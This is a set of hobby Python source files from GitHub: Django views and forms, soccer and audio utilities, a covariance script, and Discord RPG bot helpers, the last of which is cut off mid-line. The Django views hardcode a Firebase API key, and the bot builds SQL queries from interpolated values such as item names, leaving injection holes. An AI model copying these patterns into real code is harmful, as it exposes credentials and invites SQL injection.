+{"seq_id":"1243474701","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import ModelForm\nfrom apps.userprofile.models import SiteUser\nfrom apps.compo.models import Team\n\ndummy = []\n\n\nclass RegisterTeamForm(ModelForm):\n # teamname = forms.CharField(label='Lagnavn', max_length=30)\n # username = forms.ModelMultipleChoiceField(dummy)\n # action_url = 'add_team'\n class Meta:\n model = Team\n exclude = ('teamleader',)\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop(\"request\")\n tour = kwargs.pop(\"tour\")\n super(RegisterTeamForm, self).__init__(*args, **kwargs)\n unwanted_users = [self.request.user]\n for user in SiteUser.objects.all():\n if user.is_teamleader.filter(participant__tournament=tour) or \\\n user.is_teammember.filter(participant__tournament=tour):\n unwanted_users.append(user)\n self.fields['members'].queryset = SiteUser.objects.exclude(id__in=[o.id for o in unwanted_users])\n\n\nclass ChallongeForm(forms.Form):\n initial = 0\n CHOICES = (\n (u'single elimination', u'single elimination'),\n (u'double elimination', u'double elimination'),\n (u'round robin', u'round robin'),\n (u'swiss', u'swiss'),\n )\n type = forms.ChoiceField(choices=CHOICES, label=\"Challonge-type\")\n\n","repo_name":"kradalby/lanweb","sub_path":"apps/compo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"70043980901","text":"import streamlit as st\nfrom mplsoccer import Pitch\n\nclass Pitch_class():\n def create_pitch(self, row_count=None, column_count=None):\n if row_count is None:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009')\n fig, ax = pitch.draw(figsize=(16, 11),constrained_layout=True, tight_layout=False)\n return pitch, fig, ax\n \n else:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009', line_zorder=row_count+column_count+2, linewidth=1)\n fig, axs = pitch.grid(nrows=row_count, ncols=column_count, figheight=3 * (row_count+column_count),\n axis=False, endnote_height=0, title_height=0)\n return pitch, fig, axs\n \ndef add_locations(df):\n x = []; y = []\n for i, row in df.iterrows():\n x.append(row['location'][0])\n y.append(row['location'][1])\n df['x'] = x\n df['y'] = y\n return df\n\n#changes array elements by their cumuluative sum\ndef nums_cumulative_sum(nums_list):\n return [sum(nums_list[ :i+1]) for i in range(len(nums_list))]","repo_name":"berkanyuce/FIFA-World-Cup-2018-Visualization-and-Prediction","sub_path":"codes/utilites/utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"7152414899","text":"int1 = int(input())\r\nint2 = int(input())\r\nint3 = int(input())\r\n\r\nif int1 > int2 and int1 > int3:\r\n print(int1)\r\nelif int2 > int1 and int2 > int3:\r\n print(int2)\r\nelif int3 > int2 and int3 > int1:\r\n print(int3)\r\n","repo_name":"danielfilev/SoftUni","sub_path":"Fundamentals/Basic Syntax, Conditional Statements and Loops/Lab/02.largest_of_three_numbers.py","file_name":"02.largest_of_three_numbers.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"37973374926","text":"from django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport functools\nimport json\nimport os\nimport pyrebase\n \nfrom ppw.data.relational_queries import (\n accession_trend_by_time_query, active_inactive_investidors_query,\n age_distribution_query, carreer_investidor_activity_year_query,\n city_with_most_investidors_query, civil_status_investidors_activity_query,\n investidors_genre_query, most_common_job_query,\n state_with_most_investidors_query, top_3_most_common_jobs_query)\n \nconfig = {\n \"apiKey\": \"AIzaSyBWocM1wzV1lZh64h-IF1Owo-A3u8zrYlk\",\n \"authDomain\": \"projeto-ppw.firebaseapp.com\",\n \"databaseURL\": \"https://projeto-ppw-default-rtdb.firebaseio.com\",\n \"projectId\": \"projeto-ppw\",\n \"storageBucket\": \"projeto-ppw.appspot.com\",\n \"messagingSenderId\": \"1021347829402\",\n \"appId\": \"1:1021347829402:web:84b85d7e00f6956dbd3123\"\n}\n \n# Initialising database,auth and firebase for further use\nfirebase=pyrebase.initialize_app(config)\nauthe = firebase.auth()\ndatabase=firebase.database()\nPREFIX = 'Bearer '\n\ndef get_token(header):\n if not header.startswith(PREFIX):\n raise ValueError('Invalid token')\n return header[len(PREFIX):]\n\ndef check_user_auth(view_func):\n @functools.wraps(view_func)\n @csrf_exempt\n def wrapper(request, *args, **kwargs):\n if 'token' not in request.session:\n return _build_response({\"result\": \"error - user must be logged\"})\n return view_func(request)\n return wrapper\n \n@csrf_exempt\ndef signup(request):\n data = json.loads(request.body)\n email = data['email']\n passs = data['pass']\n try:\n user = authe.create_user_with_email_and_password(email, passs)\n request.session['token'] = user['localId']\n except Exception as ex:\n print (ex)\n return _build_response({\"result\": \"error to sign up\"})\n return _build_response({\"result\": \"success\"})\n\n@csrf_exempt\ndef login(request):\n data = json.loads(request.body)\n email = data['email']\n pasw = data['pass']\n try:\n user = authe.sign_in_with_email_and_password(email,pasw)\n except Exception as ex:\n print (ex)\n return _build_response({\"error\": \"invalid credentials\"})\n session_id = user['idToken']\n request.session['token'] = str(session_id)\n return _build_response({\"token\": session_id})\n\n@check_user_auth\ndef age_distribution_view(request):\n age_min = request.GET.get('age_min', 18)\n age_max = request.GET.get('age_max', 100)\n age_distribution = list(age_distribution_query(age_min, age_max))\n return _build_response(age_distribution)\n \n@check_user_auth\ndef top_3_most_common_jobs_view(request):\n top_job = list(top_3_most_common_jobs_query())\n return _build_response(top_job)\n \n@check_user_auth\ndef active_inactive_investidors_view(request):\n active_inactive_data = list(active_inactive_investidors_query())\n return _build_response(active_inactive_data)\n \n@check_user_auth\ndef state_most_investidors_lives_view(request):\n state_most_investidors = list(state_with_most_investidors_query())\n return _build_response(state_most_investidors)\n \n@check_user_auth\ndef city_most_investidors_lives_view(request):\n state = request.GET.get('state')\n city_most_investidors = list(city_with_most_investidors_query(state))\n return _build_response(city_most_investidors)\n \n@check_user_auth\ndef investidors_genre_view(request):\n age = request.GET.get('age')\n investidors_genre = list(investidors_genre_query(age))\n return _build_response(investidors_genre)\n \n@check_user_auth\ndef 
accession_trend_view(request):\n accession_trend = list(accession_trend_by_time_query())\n print (accession_trend)\n return _build_response(accession_trend)\n \n@check_user_auth\ndef most_common_carrer_view(request):\n most_common_job = list(most_common_job_query())\n return _build_response(most_common_job)\n \n@check_user_auth\ndef investidor_carreer_year_view(request):\n activity_investidor_carreer = list(carreer_investidor_activity_year_query())\n return _build_response(activity_investidor_carreer)\n \n@check_user_auth\ndef civil_status_investidors_activity_view(request):\n civil_status_investidors = list(civil_status_investidors_activity_query())\n return _build_response(civil_status_investidors)\n \ndef _build_response(result):\n return JsonResponse({'result': result})\n ","repo_name":"manoelvlm/projeto-ppw","sub_path":"api/ppw/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29508727799","text":"import librosa\nfrom pysndfx import AudioEffectsChain\nimport numpy as np\nimport math\nimport scipy\n\n\ndef read_file(file_name):\n sample_file = file_name\n sample_path = sample_file\n\n y, sr = librosa.load(sample_path, None)\n\n return y, sr\n\n\ndef reduce_noise_power(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = round(np.median(cent)) * 1.5\n threshold_l = round(np.median(cent)) * 0.1\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, frequency=threshold_l, slope=0.8)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\n y_clean = less_noise(y)\n\n return y_clean\n\n\ndef reduce_noise_centroid_s(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-12.0, frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=6.0)\n\n y_cleaned = less_noise(y)\n\n return y_cleaned\n\n\ndef reduce_noise_centroid_mb(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-30.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=10.0)\n y_cleaned = less_noise(y)\n\n cent_cleaned = librosa.feature.spectral_centroid(y=y_cleaned, sr=sr)\n columns, rows = cent_cleaned.shape\n boost_h = math.floor(rows / 3 * 2)\n\n boost_bass = AudioEffectsChain().lowshelf(gain=16.0, frequency=boost_h, slope=0.5)\n y_clean_boosted = boost_bass(y_cleaned)\n\n return y_clean_boosted\n\n\ndef reduce_noise_median(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after gain reduction on noise\n \"\"\"\n y = scipy.signal.medfilt(y, 3)\n return y\n\n\ndef trim_silence(y):\n \"\"\"\n :param y:\n :return: audio matrix with less silence and the amount of time that was trimmed\n \"\"\"\n y_trimmed, index = librosa.effects.trim(y, top_db=20, frame_length=2, hop_length=10)\n trimmed_length = librosa.get_duration(y) - librosa.get_duration(y_trimmed)\n\n return y_trimmed, trimmed_length\n\n\ndef enhance(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after audio manipulation\n \"\"\"\n apply_audio_effects = AudioEffectsChain()\\\n .lowshelf(gain=10.0, frequency=260, slope=0.1)\\\n .reverb(reverberance=25, hf_damping=5, room_scale=5, stereo_depth=50, pre_delay=20, wet_gain=0, wet_only=False)\n y_enhanced = apply_audio_effects(y)\n\n return y_enhanced\n\n\ndef output_file(destination, file_name, y, sr, ext=\"\"):\n \"\"\"\n generates a wav file\n :param destination:\n :param file_name:\n :param y:\n :param sr:\n :param ext:\n :return: None\n \"\"\"\n destination = destination + file_name.split(\"/\")[-1][:-4] + ext + '.wav'\n librosa.output.write_wav(destination, y, sr)\n","repo_name":"YunhoJung/tobigs-rhapsody-speech-synthesis","sub_path":"augmentation/reduct_noise.py","file_name":"reduct_noise.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"71907688100","text":"import logging\nimport os\n\nimport pandas as pd\nfrom decide import data_folder\nfrom decide.data.database import connection, Manager\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\n\n\ndef write_result(conn, iterations, model_run_id, output_directory):\n\n df = pd.read_sql(\"\"\"\n SELECT \n a.p as p,\n a.issue as issue, \n a.repetion || '-' || a.iteration as pointer, \n a.numerator / a.denominator AS nbs\n FROM (SELECT\n sum(ai.position * ai.power * ai.salience) AS numerator,\n sum(ai.salience * ai.power) AS denominator,\n r.pointer AS repetion,\n i2.pointer AS iteration,\n m.p,\n i.name as issue\n FROM actorissue ai\n LEFT JOIN issue i ON ai.issue_id = i.id\n LEFT JOIN actor a ON ai.actor_id = a.id\n LEFT JOIN iteration i2 ON ai.iteration_id = i2.id\n LEFT JOIN repetition r ON i2.repetition_id = r.id\n LEFT JOIN modelrun m ON r.model_run_id = m.id \n WHERE ai.type = 'after' AND i2.pointer = ? AND m.id = ? \n GROUP BY m.id,r.id, i2.id, i.id) a\n \"\"\",\n conn,\n params=(iterations, model_run_id, ),\n index_col=['p'],\n columns=['issue']\n )\n\n for p in sorted(set(df.index)):\n x = df.loc[p].pivot(index='pointer', columns='issue', values='nbs').cov().round(5)\n\n x.to_csv(os.path.join(output_directory, 'covariance.equal-{}.csv'.format(p)))\n\n logging.info('writen covariance table for p={}'.format(p))\n\n\nif __name__ == '__main__':\n m = Manager(os.environ.get('DATABASE_URL'))\n m.init_database()\n\n model_run_id = 1\n\n write_result(connection, model_run_id, data_folder)\n","repo_name":"foarsitter/decide-exchange-model","sub_path":"decide/results/covariance.py","file_name":"covariance.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"24715521621","text":"import grequests\nimport math\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport aiosqlite\nimport asyncio\nimport random\nfrom discord import Webhook, AsyncWebhookAdapter\nimport aiohttp\nfrom PIL import Image\n\neffect_list = {\n \"shatter\" : \"Your mind has been shattered! Your messages are jumbled up!\",\n \"polymorph\" : \"You're a sheep! You can't speak human languages!\",\n \"drunk\" : \"You had a bit too much to drink...\",\n \"burning\" : \"You are on fire. Good luck.\",\n \"poisoned\" : \"Every time you make an attack, you lose an extra 2 AP!\",\n \"confidence\" : \"Hey, you're pretty good at this! Slightly raises your critical chance.\",\n \"inspired\" : \"You're amazing! Good job! Considerably raises your critical chance.\",\n \"defending\" : \"You are prepared for someone to strike! Anyone who attacks you fails, wasting their AP.\",\n \"wooyeah\" : \"**WOO YEAHIM ON A ROLL**\",\n \"shrouded\" : \"You're covered in some sort of shroud! It's harder for enemies to get a crit on you!\"\n}\n\nbase_classes = {\n 1 : 'Apprentice',\n 2 : 'Swordsman',\n 3 : 'Rogue',\n 4 : 'Archer',\n}\n\nprefix = ';'\n\nunobtainable_achs = 1\n\nwith open('adjectives.txt') as f:\n sheep_names = [line.rstrip() for line in f]\n\nbody_parts = ['bones', 'hair', 'fingernail', 'thumb', 'middle finger', 'big toe', 'knees', 'kneecap', 'bum', 'cheek', 'bumcheek', 'leg hair', 'skeleton', 'ligaments', 'muscles', 'tendons', 'teeth', 'mouth', 'tongue', 'larynx', 'esophagus', 'stomach', 'small intestine', 'large intestine', 'liver', 'gallbladder', 'mesentery', 'pancreas', 'anus', 'nasal cavity', 'pharynx', 'larynx', 'trachea', 'lungs', 'diaphragm', 'groin', 'kidneys', 'heart', 'spleen', 'thymus', 'brain', 'cerebellum', 'spine', 'eye', 'ear', 'arm', 'leg', 'chest', 'neck', 'toe', 'finger']\n\nmagnitudeDict={0:'', 1:'Thousand', 2:'Million', 3:'Billion', 4:'Trillion', 5:'Quadrillion', 6:'Quintillion', 7:'Sextillion', 8:'Septillion', 9:'Octillion', 10:'Nonillion', 11:'Decillion'}\n\ndef simplify(num):\n num=math.floor(num)\n magnitude=0\n while num>=1000.0:\n magnitude+=1\n num=num/1000.0\n return(f'{math.floor(num*100.0)/100.0} {magnitudeDict[magnitude]}')\n\nasync def add_effect(target, bot, effect_name, amount = 1):\n speaker = target.id\n if speaker not in bot.user_status:\n bot.user_status[speaker] = []\n user_effects = bot.user_status[speaker]\n exists = False\n for status in user_effects: # If the status exists, increment it.\n if status[0].lower() == effect_name.lower():\n exists = True\n status[1] += amount\n if not exists:\n bot.user_status[speaker].append([effect_name.lower(), amount])\n\nasync def find_origin(user_class):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select class_name, preclass from classes;\") as chan:\n clss = await chan.fetchall()\n origin = user_class\n wcase = 0\n b_classes = [\"swordsman\", \"apprentice\", \"rogue\", \"archer\"]\n while origin not in b_classes:\n wcase +=1\n if wcase >= 10:\n break\n for item in clss:\n if item[0] == origin:\n origin = item[1]\n\n return(origin)\n\nasync def reply_check(message):\n if message.reference:\n return True\n else:\n return False\n\nasync def can_attack(user, target, ctx): # NOTE: Remember that you can't alter AP of those who have no profile in CC... 
Also, target may not always exist\n    bot = ctx.bot\n    if user not in bot.user_status:\n        bot.user_status[user] = []\n    user_effects = bot.user_status[user]\n    for status in user_effects: \n        if status[0].lower() == \"poisoned\":\n            ### HANDLE STACKS\n            remaining_stacks = status[1]-1\n            if remaining_stacks <= 0:\n                bot.user_status[user].remove(status)\n            else:\n                status[1] -= 1\n            ### APPLY EFFECT\n            uid = str(user)\n            balance = (bot.users_ap[uid] - 2)\n            if balance >= 0:\n                bot.users_ap[uid] = balance\n\n    # UPDATE ATTACKING BASED QUESTS\n    attack_based_quests = [7, 8, 9, 10, 11, 12, 13, 14]\n    async with aiosqlite.connect('main.db') as conn:\n        async with conn.execute(f\"select currently_questing from users where id = '{ctx.author.id}';\") as chan:\n            quest = await chan.fetchone()\n    if quest:\n        quest = quest[0]\n        if quest in attack_based_quests:\n            await update_quest(ctx.message, quest, 1, ctx.bot)\n    # UPDATE ATTACKING BASED QUESTS\n\n    # CHECK FOR DEFENDING AND MORE\n    \"\"\"\n    Priority List\n    1. Sellsword\n    2. Status Effects\n    \"\"\"\n\n    protected = bot.get_cog('sellsword').hired\n\n    if target in list(protected.values()):\n        vals = list(protected.values())\n        keys = list(protected.keys())\n        protector = keys[vals.index(target)]\n        try:\n            ss_hooks = [\n                \"Right as you're about to attack, you feel a stab in your back! It's usr1, usr2's sellsword! You fall over, dead!\",\n                \"You attempt to kill usr2, but usr1 blocks your attack before swiftly slicing your neck! usr2 nods at usr1, and continues on their way.\",\n                \"Your attempt to attack usr2 is thwarted by usr1, who fires a crossbow bolt into your neck right as you're about to land your attack!\",\n                \"usr2 sees your attack coming, but doesn't seem worried. Perplexed, you attempt to attack anyway! As you do, you feel usr1's blade through your back! usr2 smiles at you as the world goes dark.\"\n            ]\n            usr1 = bot.get_user(protector)\n            usr2 = bot.get_user(target)\n            hook = random.choice(ss_hooks)\n            hook = hook.replace(\"usr1\", f\"**{usr1.name}**\")\n            hook = hook.replace(\"usr2\", f\"**{usr2.display_name}**\")\n            async with aiosqlite.connect('main.db') as conn:\n                async with conn.execute(f\"select coolness from users where id = '{protector}';\") as current_amount:\n                    coolness = await current_amount.fetchone()\n                await conn.execute(f\"update users set coolness = '{coolness[0]+100}' where id = '{protector}';\")\n                await conn.commit()\n            await ctx.send(\"**[BLOCKED] | **\" + hook)\n        except:\n            await ctx.send(\"Your attempt to attack fails as their sellsword protects them, stabbing you instead!\")\n        return False\n\n    if target not in bot.user_status:\n        bot.user_status[target] = []\n    user_effects = bot.user_status[target]\n    for status in user_effects: \n        if status[0].lower() == \"defending\":\n            ### HANDLE STACKS\n            remaining_stacks = status[1]-1\n            if remaining_stacks <= 0:\n                # remove the spent status entry from the defender's own list\n                bot.user_status[target].remove(status)\n            else:\n                status[1] -= 1\n            ### APPLY EFFECT\n            await ctx.send(\"You attempt to attack, but you cannot penetrate their defenses! 
Your attack fails!\")\n return False\n # CHECK FOR DEFENDING AND MORE\n\n return True\n\nasync def crit_handler(bot, attacker, defender, boost = None): \n # Values needed for later ############################################################ #\n crit_thresh = 1 # The number needed to roll below to get a critical #\n crit_max = 20 # The maximum nuber that the critical will be rolled on #\n ########################################################################################\n # We will now check for the person being attacked's status effects, to see if they have#\n # some sort of protective status effect. #\n ########################################################################################\n \n speaker = defender\n force_crit = None\n if speaker in bot.user_status:\n user_effects = bot.user_status[speaker]\n for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. These are applied in order\n if status[0].lower() == \"shrouded\":\n crit_max += 10\n force_crit = random.randint(1,crit_max) \n ### HANDLE STACKS\n if not(force_crit <= crit_thresh):\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n ### Now we check for the rest of the stuff #\n if boost: #\n if boost > 0: #\n crit_thresh += boost #\n else: #\n crit_max += boost #\n ### #\n if force_crit != None:\n crit = force_crit\n else:\n crit = random.randint(1,crit_max) # The rolled critical chance #\n # End Values #\n ###################################################################################### #\n ###################################################################################### #\n # Getting user status effects to check for critical-altering ones ### \n # THESE ARE FOR POSITIVE EFFECTS #\n speaker = attacker\n if speaker in bot.user_status:\n user_effects = bot.user_status[speaker]\n for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. These are applied in order\n if status[0].lower() == \"confidence\":\n crit_thresh += 4\n ### HANDLE STACKS\n if crit <= crit_thresh:\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n elif status[0].lower() == \"inspired\":\n crit_thresh += 8\n ### HANDLE STACKS\n if crit <= crit_thresh:\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n # End Status Effect Check ############################################\n ######################################################################\n if crit <= crit_thresh:\n ########################################################################################\n # This is for classes that have \"when someone gets a crit on you\" effects. 
#############\n if str(defender) in bot.users_classes:\n if bot.users_classes[str(defender)] == \"pacted\":\n if await get_demon(defender, bot) == \"minehart\":\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from users where id = '{defender}';\") as info:\n user = await info.fetchone()\n level = user[8] - 19\n\n amount = 2*level \n cog = bot.get_cog('pacted')\n cog.minehart[defender] = cog.minehart[defender] + amount\n\n ########################################################################################\n ########################################################################################\n return True\n else:\n return False\n\ndef max_xp(lvl):\n return 20 * (lvl ^ 35) + 250 * lvl + 25\n\ndef max_xp_skills(lvl):\n return 85 * (lvl ^ 70) + 350 * lvl + 50\n\nasync def give_faction_points(contributor = None, f_id = None, amount = 0):\n async with aiosqlite.connect('unique.db') as conn:\n async with conn.execute(f\"select faction_points from factions where faction_id = {f_id}\") as u_info:\n faction_points = await u_info.fetchone()\n\n faction_points = faction_points[0] + amount\n if faction_points < 0:\n faction_points = 0\n\n async with aiosqlite.connect('unique.db') as conn:\n await conn.execute(f\"update factions set faction_points = {faction_points} where faction_id = {f_id};\")\n await conn.commit()\n\nasync def alter_items(uid, ctx, bot, item, change = 1, cost = 0):\n item = item.lower()\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}'\") as u_info:\n user_info = await u_info.fetchone()\n\n gold = user_info[0]\n \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select item_name, amount from inventory where uid = '{ctx.author.id}'\") as u_info:\n user_info = await u_info.fetchall()\n\n inv = user_info\n\n# [('void', 1), ('hot dog', 5)]\n\n items = [item[0] for item in inv] # Array of just the names of the items in the 2D array.\n end = \"\"\n\n if gold - cost < 0:\n await ctx.send(\"You cannot afford this item!\")\n else:\n if item in items:\n indx = items.index(item.lower())\n item_amount = int(inv[indx][1]) + change\n if item_amount >= 10:\n await award_ach(14, ctx.message, bot)\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update inventory set amount = {item_amount} where uid = {uid} and item_name = '{item.lower()}';\")\n await conn.commit()\n \n elif item not in items:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"insert into inventory values({ctx.author.id}, '{item.lower()}', {change});\")\n await conn.commit()\n \n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set gold = {gold - cost} where id = '{uid}';\")\n await conn.commit()\n if cost > 0:\n await ctx.send(f\"✅ | Purchase complete! Your gold balance is now {gold-cost}.\")\n\nasync def alter_ap(message, ap, bot):\n if str(message.author.id) in bot.registered_users:\n uid = str(message.author.id)\n balance = (bot.users_ap[uid] - ap)\n if balance >= 0:\n bot.users_ap[uid] = balance\n return True\n else:\n await message.channel.send(\"You don't have enough AP to do that! 
Buy some refreshers from the shop, do some quests, or wait until rollover!\")\n return False\n\nasync def xp_handler(message, bot, boost = 0):\n testing = False\n if boost:\n num = 4\n xp_amount = boost\n \n else: \n num = random.randint(1,4)\n if message.author.id in bot.server_boosters or message.author.id == 217288785803608074:\n xp_amount = round(1.75*(random.randint(5,50)))\n else:\n xp_amount = random.randint(5,100)\n\n if message.guild.id == 732632186204979281:\n xp_amount *= 2\n\n if num == 4:\n if str(message.author.id) in bot.registered_users:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select exp, level from users where id = '{message.author.id}';\") as profile:\n prof = await profile.fetchone()\n xp = prof[0] + xp_amount\n current_lvl = prof[1]\n if xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 != 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = 0 where id = '{message.author.id}'\")\n await conn.execute(f\"update users set level = {current_lvl + 1} where id = '{message.author.id}'\")\n await conn.commit()\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You are now level {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=10)\n elif xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 == 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {max_xp(current_lvl)} where id = '{message.author.id}'\")\n await conn.commit()\n if message.author.id not in bot.notified:\n bot.notified.append(message.author.id)\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You can now level up to {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n embed.set_footer(text=f\"A class up is available! Run {prefix}classup when you are ready.\", icon_url=\"https://lh3.googleusercontent.com/proxy/OrYbJO2bKqGtVPcWnue8XK0SRnHoC-h8VHKNTw9JoVk-k_mke8bcurTQgoKd70H_kgr9AR2CQH-GRgckkZqXbRbdf-CZgjac\")\n notif = await message.channel.send(content=f'{message.author.mention}', embed=embed)\n await notif.delete(delay=10) \n else:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {xp} where id = '{message.author.id}'\")\n await conn.commit()\n \n\nasync def webhook_safe_check(channel): # This function should be run before any webhook command in main.py. It makes sure that the channel has a webhook, and if it doesn't, it creates one.\n seeking_id = channel.id\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from webhooks where channel_id = '{seeking_id}';\") as chan:\n hook = await chan.fetchone()\n if hook:\n return hook[1]\n else:\n new_hook = await channel.create_webhook(name=f\"Chat Classes {channel.name} Webhook\")\n await conn.execute(f\"insert into webhooks values('{channel.id}', '{new_hook.url}')\")\n await conn.commit()\n return new_hook.url\n\nbasic_text_quests = [1,2,3,4,5,6,15,16,17]\nasync def on_message_quest_handler(user, mss, people, bot): # This takes the message sent, checks if it's applicable to any quest. 
I just put it here instead of main.py honestly.\n uid = str(user.id)\n if uid in people:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests, currently_questing from users where id = '{uid}';\") as chan:\n quest = await chan.fetchone()\n if quest:\n if quest[1] != 0: # If the user has a quest...\n if quest[1] in basic_text_quests:\n await update_quest(mss, quest[1], 1, bot)\n\nasync def update_quest(message, quest_id, addition, bot, silent = False):\n if addition > 0: # Setting addition to 0 will fail their quest.\n chan = message.channel\n user = message.author\n notif = None # To prevent locked db errors.\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n quest_info = await q_info.fetchone()\n\n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy # I don't want to comment this and I know I will regret this. \n # print(f\"I am setting {new_guy} up to replace {guy}.\")\n\n found = False\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n new_guy[1] = str(int(new_guy[1]) + addition)\n \n if int(new_guy[1]) >= int(quest_info[7]):\n questers.pop(questers.index(new_guy))\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests from users where id = '{message.author.id}'\") as count:\n old_count = await count.fetchone()\n new_count = old_count[0] + 1\n await conn.execute(f\"update users set completed_quests = {new_count} where id = '{message.author.id}';\")\n await conn.commit()\n async with aiosqlite.connect('main.db') as conn:\n if quest_info[2] == \"coolness\": # REWARD TYPES!\n async with conn.execute(f\"select coolness from users where id = '{message.author.id}'\") as coolness:\n old_cool = await coolness.fetchone()\n new_cool = old_cool[0] + int(quest_info[3])\n await conn.execute(f\"update users set coolness = {new_cool} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Coolness\"\n elif quest_info[2] == \"xp\": \n async with conn.execute(f\"select exp from users where id = '{message.author.id}'\") as exp:\n old_exp = await exp.fetchone()\n new_exp = old_exp[0] + int(quest_info[3])\n await conn.execute(f\"update users set exp = {new_exp} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} XP\"\n elif quest_info[2] == \"gold\": \n async with conn.execute(f\"select gold from users where id = '{message.author.id}'\") as exp:\n old_cash = await exp.fetchone()\n amount = int(quest_info[3])\n if message.author.id in bot.server_boosters and amount > 0:\n amount *= 2\n new_cash = old_cash[0] + amount\n await conn.execute(f\"update users set gold = {new_cash} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Gold\"\n else:\n pass\n\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n\n embed = discord.Embed(title=f\"Quest Complete!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_footer(text=reward, icon_url=\"\")\n embed.set_thumbnail(url=quest_info[4])\n notif = await chan.send(content=message.author.mention, embed=embed)\n if notif:\n await notif.delete(delay=10)\n\n end = 
